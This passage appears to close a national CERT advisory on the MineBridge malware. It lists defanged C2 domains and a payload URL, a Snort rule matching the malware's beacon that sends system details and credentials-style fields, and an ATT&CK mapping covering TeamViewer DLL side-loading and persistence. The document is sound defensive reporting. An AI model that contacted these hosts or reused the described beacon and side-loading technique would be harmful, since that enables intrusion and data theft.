Infrastructure | Connection type | Description
https[:]//creatorz123[.]top/~files_tv/~all_files_m.bin | Port 443/TCP | Vulnerable TeamViewer zip file
compilator333[.]top | Port 443/TCP | C2
123faster[.]top | Port 443/TCP | C2
conversia91[.]top | Port 443/TCP | C2
fatoftheland[.]top | Port 443/TCP | C2
Table 10
Snort Rules

    alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "MineBridge C2 server communication [CSIT-20032]";\
        flow:from_client, established;\
        content: "POST"; http_method; nocase;\
        content: "uuid="; http_client_body; offset: 0; depth:5; nocase;\
        content: "&id="; http_client_body; offset: 32; depth:4; nocase;\
        content: "&pass="; http_client_body; offset: 47; depth:6; nocase;\
        content: "&username="; http_client_body; offset: 59; depth:10; nocase;\
        content: "&pcname="; http_client_body; offset: 70; nocase;\
        content: "&osver="; http_client_body; offset: 79; nocase;\
        content: "&timeout="; http_client_body; offset: 87; fast_pattern; nocase;\
        classtype: trojan-activity;\
        rev:20200320;\
        sid:8001604; reference:url,falcon.crowdstrike.com/intelligence/reports/CSIT20032;)

ATT&CK Framework

Tactic | Technique | Observable
Execution | T1117: Regsvr32 | The MineBridge DLL can be executed via Regsvr32
Execution | T1085: Rundll32 | The MineBridge DLL can be executed via Rundll32
Execution | T1072: Third-Party Software | MineBridge uses TeamViewer in order to load the malicious DLL
Persistence | T1060: Registry Run Keys / Startup Folder | MineBridge creates a link in the startup folder to ensure persistence
Defense Evasion | T1073: DLL Side-Loading | MineBridge uses a DLL side-loading vulnerability in TeamViewer to load the malicious DLL
Collection | T1119: Automated Collection | MineBridge collects system information that is sent to the C2 server during the first request
Command and Control | T1043: Commonly Used Port | MineBridge uses port 443 (HTTPS) to communicate with the C2 server
Command and Control | T1071: Standard Application Layer Protocol | MineBridge uses the HTTPS protocol to communicate with the C2 server
Impact | T1529: System Shutdown/Reboot | MineBridge is able to shut down or reboot the system upon receiving a specific command from the C2 server
Table 11

Recommendations

To avoid exploitation due to the presence of the vulnerability, it is highly recommended to have the latest security updates installed.

References

CrowdStrike
aeCERT Contact Info
P.O. Box 116688, Dubai, United Arab Emirates
Tel: (+971) 4 777 4003
Fax: (+971) 4 777 4100
Email: incident[at]aeCERT.ae
Instagram: @TheUAETRA
Twitter: @TheUAETRA

For secure communications with aeCERT with regard to sensitive or vulnerability information, please send your correspondence to incident[at]aeCERT.ae.